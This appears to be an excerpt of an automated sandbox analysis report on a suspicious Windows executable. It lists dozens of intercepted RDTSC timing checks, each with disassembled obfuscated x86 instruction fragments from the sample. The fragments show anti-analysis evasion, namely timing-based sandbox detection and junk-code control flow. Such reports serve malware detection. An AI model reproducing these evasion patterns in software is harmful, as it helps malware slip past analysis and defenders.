                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B81518 second address: B8151E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8151E second address: B81531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b js 00007F0704B35536h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B86398 second address: B863B3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F0704B3A49Dh 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B863B3 second address: B863C4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F0704B35536h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B14D96 second address: B14DBC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0704B3A498h 0x00000008 pushad 0x00000009 jg 00007F0704B3A496h 0x0000000f jmp 00007F0704B3A4A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8508B second address: B85097 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0704B35536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B85097 second address: B850A1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0704B3A4B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B850A1 second address: B850BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B35546h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B85661 second address: B8566A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B857D5 second address: B857E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F0704B35536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B85C4A second address: B85C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A4A5h 0x00000009 ja 00007F0704B3A496h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8F05F second address: B8F06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0704B3553Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8F06D second address: B8F073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8DE21 second address: B8DE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B35542h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8DE39 second address: B8DE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8DE3D second address: B8DE41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8DE41 second address: B8DE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8DE47 second address: B8DE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8DE52 second address: B8DE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A49Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8E0F8 second address: B8E122 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0704B3553Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0704B35543h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8E122 second address: B8E128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8E277 second address: B8E27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B71CB4 second address: B71CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B71CB8 second address: B71CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B71CC2 second address: B71CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70DA9 second address: B70E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0704B35538h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov ebx, esi 0x00000024 push dword ptr fs:[00000000h] 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F0704B35538h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c mov ebx, dword ptr [ebp+122D358Ah] 0x00000052 mov eax, dword ptr [ebp+122D014Dh] 0x00000058 or dword ptr [ebp+122D255Ch], edx 0x0000005e push FFFFFFFFh 0x00000060 js 00007F0704B35552h 0x00000066 push eax 0x00000067 jc 00007F0704B35544h 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 popad 0x00000071 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70E42 second address: B70E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8E969 second address: B8E9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0704B35549h 0x0000000b jmp 00007F0704B35541h 0x00000010 popad 0x00000011 push eax 0x00000012 jc 00007F0704B35536h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8D82C second address: B8D850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0704B3A496h 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F0704B3A4A4h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8D850 second address: B8D859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8D859 second address: B8D85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B8D85F second address: B8D863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5917E second address: B40255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F0704B3A496h 0x0000000b jc 00007F0704B3A496h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F0704B3A498h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dx, 4A24h 0x00000034 call 00007F0704B3A4A1h 0x00000039 mov ecx, edx 0x0000003b pop edi 0x0000003c lea eax, dword ptr [ebp+1247DEFEh] 0x00000042 push eax 0x00000043 jl 00007F0704B3A49Eh 0x00000049 push ebx 0x0000004a je 00007F0704B3A496h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp], eax 0x00000054 mov dl, 74h 0x00000056 call dword ptr [ebp+122D2A02h] 0x0000005c push ecx 0x0000005d push eax 0x0000005e push edx 0x0000005f jnl 00007F0704B3A496h 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59348 second address: B5934E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59684 second address: B59692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0704B3A496h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5973A second address: B59776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F0704B35543h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jl 00007F0704B3553Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59776 second address: B5977D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59870 second address: B59888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007F0704B3553Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59888 second address: B5988E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5988E second address: B59893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59A8D second address: B59A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59A93 second address: B59A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B59BB8 second address: B59BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A07F second address: B5A085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A085 second address: B5A08B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A21B second address: B5A238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F0704B3553Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A2AD second address: B5A2B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A2B3 second address: B5A2B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A2B8 second address: B5A2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A2BE second address: B5A2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D2A80h] 0x0000000e sub cl, FFFFFFF3h 0x00000011 lea eax, dword ptr [ebp+1247DF42h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F0704B35538h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A2F8 second address: B40D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0704B3A4A1h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, ecx 0x00000011 lea eax, dword ptr [ebp+1247DEFEh] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F0704B3A498h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 sub dword ptr [ebp+122D28F0h], ebx 0x00000037 push eax 0x00000038 ja 00007F0704B3A49Eh 0x0000003e mov dword ptr [esp], eax 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F0704B3A498h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b stc 0x0000005c call dword ptr [ebp+122D2843h] 0x00000062 push eax 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B93A3E second address: B93A4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0704B35536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9416C second address: B94195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0704B3A496h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F0704B3A49Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F0704B3A496h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B94195 second address: B94199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9C77C second address: B9C781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9C781 second address: B9C78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0704B35536h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9CBF3 second address: B9CC1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0704B3A4A7h 0x00000013 jno 00007F0704B3A496h 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9CDAE second address: B9CDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9C286 second address: B9C28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9D060 second address: B9D06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0704B35536h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9D1EB second address: B9D1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9D1F1 second address: B9D213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0704B35536h 0x0000000a jmp 00007F0704B35547h 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9D213 second address: B9D218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B9D3D7 second address: B9D3E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA06D2 second address: BA06D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA016D second address: BA0173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA0173 second address: BA0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F0704B3A496h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA0187 second address: BA018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA02F1 second address: BA02F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA041D second address: BA0423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B132A6 second address: B132C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A4A1h 0x00000009 js 00007F0704B3A496h 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA6D33 second address: BA6D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA6FA3 second address: BA6FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0704B3A4A7h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA6FC2 second address: BA6FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA6FC6 second address: BA6FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA6FCC second address: BA6FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F0704B3553Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA7144 second address: BA714F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA714F second address: BA715D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3553Ah 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA715D second address: BA7161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA73F9 second address: BA7419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0704B3553Dh 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BA7419 second address: BA7444 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0704B3A49Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0704B3A4A5h 0x0000000f jp 00007F0704B3A496h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAD2CC second address: BAD2FE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0704B35543h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F0704B35545h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: BAC0E3 second address: BAC0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3A4A3h 0x00000009 popad 0x0000000a rdtsc
